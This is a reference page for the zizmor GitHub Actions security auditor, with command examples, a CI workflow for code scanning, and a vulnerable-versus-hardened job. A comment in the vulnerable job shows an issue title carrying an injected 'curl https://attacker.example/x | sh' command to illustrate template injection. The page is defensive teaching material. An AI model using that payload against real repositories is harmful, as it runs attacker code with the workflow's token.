Linux command
zizmor command
Text
Copy the commands below and replace file names, directories, or arguments as needed.
Common examples
Audit all GitHub Actions in current directory
zizmor .
Output in SARIF format (written to a file for upload to GitHub code scanning; inputs may be files, directories, or remote owner/repo slugs)
zizmor --format sarif .github/workflows/ > results.sarif
Run fully offline
zizmor --offline .
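The SARIF example above is most useful when it feeds GitHub code scanning. The workflow below is an added example (not taken from this page or from the zizmor project's own documentation) that runs zizmor against the repository's own workflow files on every push and pull request and uploads the result. It assumes the repository has code scanning enabled and that the referenced actions exist at the tags shown; the tag-based `@v4`/`@v5`/`@v3` references are kept only for readability and should be replaced with full commit SHAs in a real repository.

```yaml
# Added example: run zizmor in CI and publish findings to code scanning.
# Assumes code scanning is enabled on the repository.
name: zizmor

on:
  push:
    branches: [main]
  pull_request:

permissions: {}   # nothing at the top level; each job asks for what it needs

jobs:
  zizmor:
    runs-on: ubuntu-latest
    permissions:
      security-events: write   # required to upload SARIF
      contents: read           # required to check out the repository
      actions: read            # required by upload-sarif on private repositories
    steps:
      # Pin these to full commit SHAs in production; zizmor's own
      # unpinned-uses audit will flag the floating tags used here.
      - uses: actions/checkout@v4
        with:
          persist-credentials: false   # do not leave the job token in .git/config

      - uses: astral-sh/setup-uv@v5

      - name: Run zizmor
        # --no-exit-codes keeps the step green so the upload below runs;
        # findings surface as code-scanning alerts instead of a red step.
        run: uvx zizmor --format sarif --no-exit-codes . > results.sarif
        env:
          # Lets the online audits (advisory lookups, ref checks) query the
          # GitHub API. Remove this and add --offline for a network-free run.
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Upload SARIF to code scanning
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: results.sarif
          category: zizmor
```

Because zizmor exits non-zero whenever it has findings, a run without `--no-exit-codes` (or `continue-on-error: true` on the step) would fail before the SARIF is uploaded.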
Description
zizmor is a static analysis tool for GitHub Actions. It audits workflow and composite-action YAML for security weaknesses, including template injection (untrusted `${{ ... }}` expressions expanded inside `run:` scripts), actions referenced by mutable tags or branches instead of full commit SHAs, and use of actions with published security advisories. It ships roughly two dozen audits (the count grows with releases) and can emit SARIF for upload to GitHub code scanning. It is not offline by default: a few audits, such as checking referenced actions against the GitHub Advisory Database, call the GitHub API and need a token supplied via `GH_TOKEN` or `--gh-token`. Pass `--offline` to restrict a run to the audits that need no network access.
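To make the two most common findings concrete, the following is an added example (not from this page or the zizmor project): one small job written first in the form zizmor flags, then hardened. It assumes a public repository, where issue titles are attacker-controlled, and uses `attacker.example` and `<full-commit-sha>` as placeholders rather than real values.

```yaml
# Added example: the same job before and after fixing zizmor's
# template-injection and unpinned-uses findings.
name: triage

on:
  issues:
    types: [opened]

permissions:
  contents: read

jobs:
  # BEFORE: both steps are flagged.
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # unpinned-uses: a mutable tag; whoever controls the tag controls the code.
      - uses: actions/checkout@v4
      # template-injection: the runner expands the expression into the shell
      # script text *before* bash parses it. An issue titled
      #   "; curl https://attacker.example/x | sh; echo "
      # turns this line into
      #   echo "New issue: "; curl https://attacker.example/x | sh; echo ""
      # which runs attacker code with the job's token and permissions.
      - run: echo "New issue: ${{ github.event.issue.title }}"

  # AFTER: same behaviour, neither finding.
  hardened:
    runs-on: ubuntu-latest
    steps:
      # Pin to the full 40-hex commit SHA of the release you want (placeholder
      # here) and keep the human-readable tag as a trailing comment.
      - uses: actions/checkout@<full-commit-sha>  # v4
        with:
          persist-credentials: false
      # Route untrusted data through the environment. The expression is
      # substituted only into the variable's value; bash then sees "$TITLE"
      # as an ordinary quoted variable, so nothing in it is parsed as code.
      - run: echo "New issue: $TITLE"
        env:
          TITLE: ${{ github.event.issue.title }}
```

The same `env:` indirection applies to every attacker-influenced context (`github.event.pull_request.title`, `github.head_ref`, comment bodies, branch names); the pinning rule applies to every `uses:` line, including Docker image references.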
FAQ
What is the zizmor command used for?
zizmor is a static analysis tool for GitHub Actions workflows. Across roughly two dozen audits it flags template injection, actions pinned to mutable tags instead of commit SHAs, and actions with known security advisories, and it can write SARIF for GitHub code scanning. Its online audits need a GitHub token (`GH_TOKEN` or `--gh-token`); pass `--offline` to skip them.
How do I run a basic zizmor example?
Run `zizmor .` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
Where can I find more zizmor examples?
This page includes 3 examples for zizmor, plus related commands for nearby Linux tasks.